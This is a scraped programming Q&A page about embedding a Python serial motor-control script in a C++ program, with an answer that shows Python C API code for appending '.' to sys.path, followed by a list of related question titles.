print "Motor speed must be an integer."
exit(e_code)
#print board_num
Thank you in advance! If you have any alternative ways to get this working in the same way, I'm open for suggestions!

Try this code to append . to your sys.path:
PyObject *sys_path;
PyObject *path;
sys_path = PySys_GetObject("path");
path = PyString_FromString(".")
if (PyList_Append(sys_path, path) < 0)
source: http://www.gossamer-threads.com/lists/python/dev/675857
OLD:
First try to execute your Python script alone, with python on the command line.
It is harder to debug Python errors from a C/C++ program. Did you install pySerial?

We Keep Coding

Python is a programming language that lets you work quickly and integrate systems more effectively.

fgetc causes a segfault after running the second time - python

Related

GDB failing with Pwntools on log: (gdb) Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target... Remote connection closed

Deadlock when combining Python with TBB

C++ debug/print custom type with GDB : the case of nlohmann json library

'strsep' causing Linux kernel freeze

Embedding python serial controller in C++

Categories

Resources